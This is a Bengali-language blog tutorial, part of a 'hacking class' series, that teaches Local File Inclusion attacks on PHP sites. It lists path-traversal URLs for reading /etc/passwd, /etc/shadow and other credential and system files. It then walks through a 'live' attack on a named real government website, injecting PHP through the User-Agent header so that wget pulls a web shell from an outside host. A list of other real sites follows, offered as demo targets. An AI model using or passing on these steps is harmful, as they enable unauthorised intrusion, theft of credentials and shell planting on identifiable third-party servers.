…::: LFI হ্যাকিংয়ের সম্পূর্ণ বাংলা টিউটোরিয়াল :::… পর্ব- ৬

লিখেছেন টিজে
অনির্বাচিত টিউনার™
-
17
898

আসসালামু আলাইকুম, সবাই্কে আবারও ভ্রাম্যমান হ্যাকিং ক্লাসে আপনাদের স্বাগতম। কেমন আছেন আছেন? আশা করি সবাই মহান আল্লাহ তায়ালার অশেষ রহমতে আশেপাশের সবাইকে নিয়ে খুবই ভাল আছেন। ভাল থাকুন ও ভাল রাখুন আপনার পাশের মানুষটিকে।

হ্যাকিং নিয়ে ধারাবাহিক পর্বগুলো দেখেনঃ

…::: LFI হ্যাকিংয়ের সম্পূর্ণ বাংলা টিউটোরিয়াল :::… পর্ব- ৬

Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting

ইতিমধ্যে আমি মনে হয়, হ্যাকিংয়ের ধারাবাহিক পোষ্ট লেখা শুরু করেছি :P হা হা আপনারাও হ্যাকার হয়ে যাচ্ছেন। শুভ কামনা আপনাদের জন্য। হ্যাকিং শিখুন কিন্তু হ্যাকিং ক্ষতি করার উদ্দেশ্যে কাজে লাগাবেন না। মূলতঃ হ্যাকিং ম্যাথডের শেষ নেই। আশা করি কেউ বলতে পারবে না যে, আমি হ্যাকিংয়ের সবই পারি, তাহলে সে ভুল বলেছে। একের পর এক নিয়ম তৈরি হচ্ছে। হ্যাকিং করা হয় আসলে নিজের মেধা দিয়ে। আপনি যে ভাবে পারেন, হ্যাকিং করে যাবেন। আজ দেখাব হ্যাকিংয়ের আরেকটি জনপ্রিয় ম্যাথড। এটা অনেকেই ব্যবহার করে থাকে। চলুন তাহলে মূল পর্বে চলে যাওয়া যাক।

LFI! হ্যাকারদের একটি জনপ্রিয় ম্যাথড। এটি একটি সংক্ষিপ্ত নাম। এই সংক্ষিপ্ত শব্দটির পূর্ণরূপ হল Local File Inclusion. আজ আপনাদের হাতে-কলমে দেখাব কিভাবে আপনি একটা সাইটে LFI Injection দিতে হয়।

প্রথমে নিচের PHP কোডগুলো দেখুন…

<?php
$page=$_GET[page];
include($page);
?>

উপরে php কোডটি অনেক ওয়েবডেভেলপাররাই তাদের ওয়েবসাইটে ব্যবহার করে থাকে। কিন্তু এটি আসলে তারা ভুল করে থাকে। কারণ এই $page কোডটি sanitized না এবং এটি এটা হ্যাকারদের পথটা সহজ করে দেয়। মূলতঃ এই কোডটি হ্যাকাররা তাদের LFI হ্যাকিংয়ের কাজে ব্যবহার করে থাকে। আপনি যদি বিভিন্ন সাইট ঘুরে থাকেন, তাহলে হত নিচের কোড সাইটের লিংক দেখতে পারবে।

www.mywebsite.com/index.php?page=products.php

আপনি এই ধরনের সাইটে, কোন ধরনের পরীক্ষা ছাড়াই বুঝতে পারবেন যে, এটি একটি ভ্যালুয়েব ওয়েবসাইট। ধরেন আপনি একটা সাইটে ঢুকলেন, উক্ত সাইটের URL হল

www.mywebsite.com/index.php?page=mypage.php

এখানে দেখেন, mypage.php পাতাটি সার্ভারে নেই, তাই এটি একটি php error message ম্যাসেজ দেবে। যেমনঃ-

Warning: include() [function.include]: Failed opening 'mypage.php' for inclusion.........

তাহলে এবার আমরা এই সাইটে প্রবেশ করব। আমরা জানলাম যে, এটি একটি vulnerable ওয়েবসাইট। যদি এই সাইটটি unix server এ হয়ে থাকে, তাহলে আমরা হয়ত পাসওয়ার্ডে ফাইলটি এখান থেকে বের করতে পারব। etc/passwd এই ডাইরেক্টরিতে সাধারণত পাসওয়ার্ড সংরক্ষিত থাকে। যেমনঃ

www.mywebsite.com/index.php?page=../etc/passwd
www.mywebsite.com/index.php?page=../../etc/passwd
www.mywebsite.com/index.php?page=../../../etc/passwd
www.mywebsite.com/index.php?page=../../../../etc/passwd

এখন আমরা ../ ফাইলে প্রবেশ করে পাসওয়ার্ড নিতে চেষ্টা করব। এখানে একটা জিনিস মনে রাখেবন। সেটার জন্য নিচের লিংকটি দেখেন…

www.mywebsite.com/index.php?page=products

এখানে একটা জিনিস লক্ষ্য করুন যে, .php এর পর ?page=products রয়েছে। এটি আসলে ম্যানুয়ালি করা হয়েছে। তাই এখানে .php হল

<?php

$page=$_GET[page];

include($page.’php’);

?>

এই জন্যই লিংকের শেষে null extension ব্যবহৃত হয়ে থাকে।
www.mywebsite.com/index.php?page=../etc/passwd
www.mywebsite.com/index.php?page=../../etc/passwd
www.mywebsite.com/index.php?page=../../../etc/passwd
www.mywebsite.com/index.php?page=../../../../etc/passwd
বেশিক্ষণ নেই, আপনি এই সাইটের পাসওয়ার্ড ফাইলগুলো পেয়ে যাবেন। ‘passwd’ file ফাইল সম্পর্কে আগামি বিস্তারিত বলা হবে। এছাড়াও আপনি আরও দেখতে পাবেন…
etc/profile 
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
এই ফাইলগুলো আপনাকে সার্ভারের আরও গুরুত্বপূর্ণ অনেক তথ্য দিবে।

….:::::এবার আমরা Live হ্যাকিং দেখব:::::….

শুরু করার আগে আপনাকে কিছু জিনিস নিতে হবেঃ—–

…::: LFI হ্যাকিংয়ের সম্পূর্ণ বাংলা টিউটোরিয়াল :::… পর্ব- ৬

1) Site vulnerable to LFI ( http://www.bislig.gov.ph )
2) Remote shell ( http://www.yourhosting/urshell.txt)
3) User-Agent switcher ( https://addons.mozilla.org/en-US/firefox…-switcher/
4) Mozilla Firefox Browser
——————————————————————————————————
প্রথমেই দেখে নিন আপনার সাইটটি LFI এর জন্য vulnerable  কিনা। এবার etc/passwd ফাইলটি ওপেন করতে চেষ্টা করুন। যেমনঃ 
 http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../etc/passwd
ঠিক আছে। আমরা এখন etc/passwd ফাইলটি ওপেন করে ফেলেছি। এবার টাইপ করুনঃ      proc/self/environ
যেমনঃ-
http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../proc/self/environ
এবার User-Agent switcher টি ডাউনলোড করুন। এবার Tools –> Default User-Agent –> Edit User Agents এখানে যান। তাহলে নিচের মতো করে আসবে…
…::: LFI হ্যাকিংয়ের সম্পূর্ণ বাংলা টিউটোরিয়াল :::… পর্ব- ৬
এবার আমরা নতুন একটি new user-agent তৈরি করব। এজন্য এখানে যান New –> New User-Agent. তাহলে আপনি নিচের মতো করে দেখতে পাবেন।
undefined …::: LFI হ্যাকিংয়ের সম্পূর্ণ বাংলা টিউটোরিয়াল :::… পর্ব- ৬
<?php phpinfo();?>
এখানে যেটা যেভাবে আছে, সেভাবেই রেখে চলে আসুন। Description এ নাম লিখুন এবং User-Agent টি এখানে পেষ্ট করুন।
User-Agent এর Tools –> Default User Agent –> PHP Info তে যান। এবার আপনার সাইটে যান ও রিফ্রেস দেন। তাহলে আ্পনি উক্ত সাইটে নিচের মতো দেখতে পাবেন।
undefined …::: LFI হ্যাকিংয়ের সম্পূর্ণ বাংলা টিউটোরিয়াল :::… পর্ব- ৬
এবার Ctrl+F চেপে “disable_functions”  খুঁজে বের করুন।
disable_functions     | no value    | no value
এখন আমরা আমাদের সেল দিতে পারব। এবার আবারও আপনার User-Agent এ যান ও Edit করুন। এবার “User-Agent” টি পরিবর্তন করে লিখুন
<?exec('wget http://www.sh3ll.org/egy.txt -O shell.php');?>
[ এটা কোথা থেকে নিলাম? আপনাকে প্রথমে যে ডাউনলোড করতে বলা হল সেল। সেখান থেকে এটা নেয়া হয়েছে। এখানে আমরা উপরে একটি .txt ফাইল ডাউনলোড করেছি। আপনি এটা ওপেন করুন। এবার File –> Save as এ যান। এবার shell.php নাম দিয়ে সেভ করুন। ]
এবার এটি সেভ করে সাইটটি রিফ্রেস করুন। এবার তাহলে এখানে যান http://www.bislig.gov.ph/shell.php মানে এটা আপনার ভিকটিমের সাইটের লিংক।
কিছু ডেমো সাইট লিংক দিলাম
http://hwcf.com.pk/golf/index.php?page=….lf/environ
http://www.lrh.gov.pk/Nursing_School/ind…lf/environ
http://www.aladde.org/index.php?load=../…lf/environ
http://www.findinsl.com/index.php?load=….lf/environ
http://www.holzprof.ee/index.php?action=…lf/environ
http://www.bislig.gov.ph/content1.php?pa…lf/environ
http://www.tendokarate.no/index.php?page…lf/environ
http://www.cranberries-gifts.co.uk/categ…lf/environ
সবাইকে অনেক অনেক ধন্যবাদ। ভাল থাকুন ও ভাল রাখুন পাশের মানুষটিকে।
টিউনারপেজের নতুন টিউন আপনাকে ইমেইল করব?
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting

সম্পর্কিত টিউনলেখক থেকে আরো

17 মন্তব্য

    • হা হা হা হা হা। আসলে পিডিএফ করার জন্য টিউনারপেজে অনেকগুলো সফটওয়্যার ও টুলস আছে। আপনি এটা ডাউনলোড করে নিন। তার পর আপনার পচন্দ অনুযায়ী পোষ্টটি পিডিএফ ফরম্যাটে ডাউনলোড করে নিতে পারবেন। ধন্যবাদ

  9. আমার প্রিয় পোস্টের ঝুলি তো আপনার হ্যাকিং ক্লাস দিয়া ভইরা গেল। হে হে হে হে।

  11. একটা ফ্লাশ চট রুম আ Joomla! দু আসে ওই রুম তা কি ভাব হক করবো ?? নিচে হয়্সা

মন্তব্য দিন আপনার